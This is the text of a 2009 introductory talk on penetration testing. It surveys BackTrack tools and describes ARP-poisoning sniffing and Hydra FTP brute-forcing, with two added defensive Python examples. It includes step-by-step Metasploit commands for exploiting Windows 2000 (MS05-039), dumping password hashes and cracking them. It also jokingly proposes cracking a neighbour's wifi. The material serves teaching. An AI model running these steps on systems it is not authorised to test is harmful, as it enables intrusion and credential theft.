Hack Attack!
An Introduction to Penetration Testing

Steve Phillips (aka fraktil)
2009.12.17 @ SBLUG
Who Am I?
●   Attended UCSB 2004-2008
    –   Majored in Math and Philosophy, not CS
●   Started using Linux in 2001
    –   Mandrake, then Slackware, then Debian
●   Applying for penetration testing job in January
●   Biases/“Preferences”
    –   Linux > Windoze (duh)
    –   Python > Ruby
    –   Emacs > vi
    –   Debian (and variants) > others
Can Hacking Be Ethical?
                Or, what is Ethical Hacking?

●   Black Hat
    –   Compromises computer systems without permission
    –   Criminal
●   White Hat, aka Ethical Hacker
    –   Gets paid to hack – legally (friggin' sweet)
    –   Always gets permission before attacking a system
●   Gray Hat
    –   Some combination of Black and White
The Stages of Hackerdom
●   Script Kiddie (“skiddie”)
    –   Can only run automated tools
    –   Doesn't understand underlying technology
●   Advanced Beginner
    –   Mastered advanced features of many tools
    –   Knows enough programming to create own tools
        ●   C => Python, Ruby (see next slide)
●   Uberhacker
    –   Discovers new vulnerabilities (or new types of vulns)
    –   Knows Assembly, C, Python and/or Ruby, SQL
    –   Excellent programmer; writes tools, scripts regularly
    –   Can defend as well as attack (firewalls, IDS, etc)
Programming Languages Used to
     Create Hacking Tools
●   C
    –   Nmap (network mapper, portscanner, more)
    –   Nessus (vulnerability detection)
    –   Wireshark (network sniffer)
●   Python
    –   w3af (web app attack framework)
    –   sqlmap (automatic SQL injection)
    –   TheMiddler (session hijacking, targeted pw sniffing)
●   Ruby
    –   Metasploit (vuln exploitation, much more)
What About in Back|Track 4?
                    Overall: Tools + Exploits
●   File count: find /pentest | grep '\.c$' | wc -l
●   Line count: cat $(find /pentest | grep '\.c$') | wc -l
●   C: 4058 .c files, 1,300,000 lines
●   Python: 2431 .py files, 612,000 lines
●   Ruby: 5468 .rb files, 694,000 lines
    –   2773 files from Metasploit
    –   1271 files from Dradis (information organizing, sharing)
    –   1424 other
●   C++: 431 .cpp files, 144,000 lines
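Added example, not code from the talk: the same census the two shell commands on this slide perform, done in Python with os.walk and a real extension check, so a file such as README.doc is never counted as C the way an unescaped `.c$` grep pattern would count it. Everything it scans is a constructed sample tree written to a temp directory; pass your own path (for example /pentest) to census() for a real count.

```python
"""Count source files and lines per extension under a directory tree.

Added example for the Back|Track 4 census slide; not the talk's own code.
"""
import os
import tempfile
from collections import defaultdict


def census(root, extensions=('.c', '.py', '.rb', '.cpp')):
    """Walk `root` and return {ext: (file_count, line_count)}.

    os.path.splitext gives the true extension, so 'README.doc' is not
    mistaken for a '.c' file the way a regex like '.c$' would.
    """
    counts = defaultdict(lambda: [0, 0])
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            ext = os.path.splitext(name)[1]
            if ext not in extensions:
                continue
            path = os.path.join(dirpath, name)
            # errors='replace' keeps stray binary bytes from aborting the walk
            with open(path, encoding='utf-8', errors='replace') as fh:
                lines = sum(1 for _ in fh)
            counts[ext][0] += 1
            counts[ext][1] += lines
    return {ext: tuple(v) for ext, v in counts.items()}


def make_sample_tree():
    """Write a small constructed tree (assumption: file contents and
    layout are made up to mimic a tiny /pentest) and return its path."""
    root = tempfile.mkdtemp(prefix='pentest-census-')
    files = {
        'exploits/a.c': 'int main(void) {\n    return 0;\n}\n',
        'exploits/b.c': '/* two lines */\nint x;\n',
        'web/scan.py': 'import sys\nprint(sys.argv)\n',
        'framework/lib/core.rb': "puts 'hi'\n",
        'notes/README.doc': 'not source\n',
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, 'w', encoding='utf-8') as fh:
            fh.write(body)
    return root


if __name__ == '__main__':
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()
    for ext, (nfiles, nlines) in sorted(census(target).items()):
        print(f'{ext:5} {nfiles:6} files {nlines:10,} lines')
```

Run it with no argument to census the constructed tree, or with a directory argument to census a real one.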
What About in Back|Track 4?
                Exploits Only (from exploitdb)

●   C
    –   1321 .c files
●   Python
    –   405 .py files
●   Ruby
    –   146 .rb files
●   C++
    –   110 .cpp files
TIOBE Index
Programming Language Popularity
Back|Track 4 Categories
●   Information Gathering
    –   Email addresses, DNS
●   Network Mapping
●   Vulnerability Identification
●   Web Application Analysis
●   Radio Network Analysis
●   Penetration (not that kind)
Back|Track 4 Categories
●   Privilege Escalation
●   Maintaining Access
●   Digital Forensics
●   Reverse Engineering
●   VoIP (Voice over Internet Protocol)
●   Misc
DEMO: Sniffing Passwords
             with Ettercap
●   ARP Poisoning for MitM Attack
    –   Associate attacker's MAC with router's IP
    –   Target tries to route traffic through router
        ●   Routes it through attacker instead
    –   Attacker forwards traffic both ways
    –   Attacker can silently watch or inject traffic
        ●   TheMiddler, sslstrip
How Else Can We Get Creds?
●   Phishing
    –   Via email
●   Spear Phishing
    –   Becoming popular
    –   Very hard to stop
●   In-person Social Engineering
    –   Kevin Mitnick is famous for this
●   Brute force
DEMO: Bruteforcing FTP
●   Using Hydra to bruteforce weak FTP password
    –   Well, really a dictionary attack
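Added example, not code from the talk or from Hydra: the defender's side of this demo. A dictionary run leaves an obvious trail in the FTP server's log, a burst of failed logins from one client, often against several usernames, sometimes followed by a success. The detector below reads that log and flags the client. The log lines are constructed and modelled on vsftpd's log format (an assumption; another FTP daemon will need its own regex).

```python
"""Flag FTP dictionary attacks from server log lines.

Added example for the Hydra demo slide; not the talk's own code.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log, modelled on vsftpd's format (assumption). 10.0.0.99 is
# the client running the dictionary attack.
SAMPLE_LOG = """\
Thu Dec 17 20:00:01 2009 [pid 2201] [alice] OK LOGIN: Client "10.0.0.7"
Thu Dec 17 20:00:05 2009 [pid 2202] [admin] FAIL LOGIN: Client "10.0.0.99"
Thu Dec 17 20:00:06 2009 [pid 2202] [admin] FAIL LOGIN: Client "10.0.0.99"
Thu Dec 17 20:00:06 2009 [pid 2202] [root] FAIL LOGIN: Client "10.0.0.99"
Thu Dec 17 20:00:07 2009 [pid 2202] [ftp] FAIL LOGIN: Client "10.0.0.99"
Thu Dec 17 20:00:09 2009 [pid 2202] [admin] FAIL LOGIN: Client "10.0.0.99"
Thu Dec 17 20:00:12 2009 [pid 2203] [bob] FAIL LOGIN: Client "10.0.0.8"
Thu Dec 17 20:00:30 2009 [pid 2203] [bob] OK LOGIN: Client "10.0.0.8"
Thu Dec 17 20:00:40 2009 [pid 2202] [admin] OK LOGIN: Client "10.0.0.99"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4}) '
    r'\[pid \d+\] \[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: '
    r'Client "(?P<ip>[^"]+)"')


def parse_log(text):
    """Return [(timestamp, client_ip, username, 'OK'|'FAIL'), ...]."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group('ts'), '%a %b %d %H:%M:%S %Y')
        events.append((ts, m.group('ip'), m.group('user'), m.group('result')))
    return events


def find_bruteforce(events, threshold=4, window=timedelta(seconds=60)):
    """Return {client_ip: details} for clients with `threshold` or more
    failed logins inside any `window`-long span. `later_success` records
    whether the client eventually logged in after reaching the threshold,
    i.e. whether the guess probably worked."""
    fails = defaultdict(list)
    users = defaultdict(set)
    success_after = set()
    for ts, ip, user, result in sorted(events):
        if result == 'FAIL':
            fails[ip].append(ts)
            users[ip].add(user)
        elif len(fails.get(ip, ())) >= threshold:
            success_after.add(ip)
    alerts = {}
    for ip, times in fails.items():
        # sliding window over the sorted failure times
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {'failures': peak,
                          'usernames': sorted(users[ip]),
                          'later_success': ip in success_after}
    return alerts


if __name__ == '__main__':
    for ip, info in find_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(f'ALERT {ip}: {info}')
```

A client that trips this rule is exactly what fail2ban-style tooling blocks at the firewall; the underlying fix is the one the slide hints at: no weak passwords, no root or admin logins over FTP, and ideally SFTP in place of FTP so the credentials never cross the wire in the clear.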
DEMO: Pwning Win2k
●   Create database (or connect to existing)
    –   db_create [optional_database_name]
●   Find win2k box using nmap (in metasploit)
    –   db_nmap -sV -p 135,139,445 xxx.xxx.xxx.0/24
●   Search Metasploit for win2k exploits
    –   search 2000
●   Use exploit w/meterpreter
    –   use exploit/windows/smb/ms05_039_pnp
    –   set PAYLOAD windows/meterpreter/bind_tcp
●   Which parameters still need to be set?
    –   show options
DEMO: Pwning Win2k
●   Set parameters
    –   set RHOST [target_ip]
●   Now we exploit! Can you guess the command?
    –   exploit
●   Get hashes
    –   hashdump
    –   This would be much harder without meterpreter!
●   Copy and paste hashes into new text file
●   Crack hashes with john the ripper
    –   ./john [file_containing_hashes].txt
●   Game Over
Why Become an Ethical Hacker?
●   Field is growing (see next slide)
    –   New laws, regulations
    –   US government falling behind in cyber security
●   You get paid to hack – need I say more?
    –   Banks
    –   Telecoms
    –   Casinos
    –   Foreign countries (for the federal gov't)
How Can I Practice Legally?
●   Virtualization (VMware, VirtualBox)
    –   Use virtual images from recent CTF competitions
        ●   http://lampsecurity.org/capture-the-flag-6
        ●   http://ctf.hcesperer.org/25c3ctf
        ●   http://ctf.hcesperer.org/daopen08
        ●   http://ctf.hcesperer.org/eh08ctf
●   NetWars
    –   Part of government's Cyber Defense Initiative 2009
●   DVL: Damn Vulnerable Linux
    –   Purposely misconfigured, exploitable
    –   http://tinyurl.com/dvllinux15
Further Resources
                           Learning

●   Metasploit
    –   Online Class: http://www.offensive-security.com/metasploit-unleashed/
●   Nmap Guide
    –   http://nmap.org/book/man.html
●   Security Videos, Tutorials
    –   http://securitytube.net
Tools Added to Back|Track
                  Extra Tools I Used

●   Metasploit 3.3.2 (updated)
●   Nmap 5.0 (updated)
●   Exploitdb archive (/pentest/exploits/exploitdb)
Summary
●   Hacking can be ethical
●   “Computer security” is an oxymoron
    –   No one is safe
●   REALLY powerful hacking tools exist
●   Metasploit is effing dangerous
Future Demos?
●   More local fun
    –   Crack neighbor's wifi (WEP)
    –   Exploit remote vuln in DD-WRT firmware
    –   Redirecting traffic using fake DNS server
    –   Intercepting Twitter, Facebook, LinkedIn creds
●   More like real pen testing
    –   SQL injection
    –   XSS
    –   Nessus scan
Contact Information
●   Name:       Steve Phillips
●   New Blog:   SweetHack.blogspot.com
●   Email:      fraktil@gmail.com
●   Twitter:    twitter.com/fraktil
●   LinkedIn:   linkedin.com/in/sdphillips
●   IRC:        fraktil in #sblug on borg-cube.com
Questions?
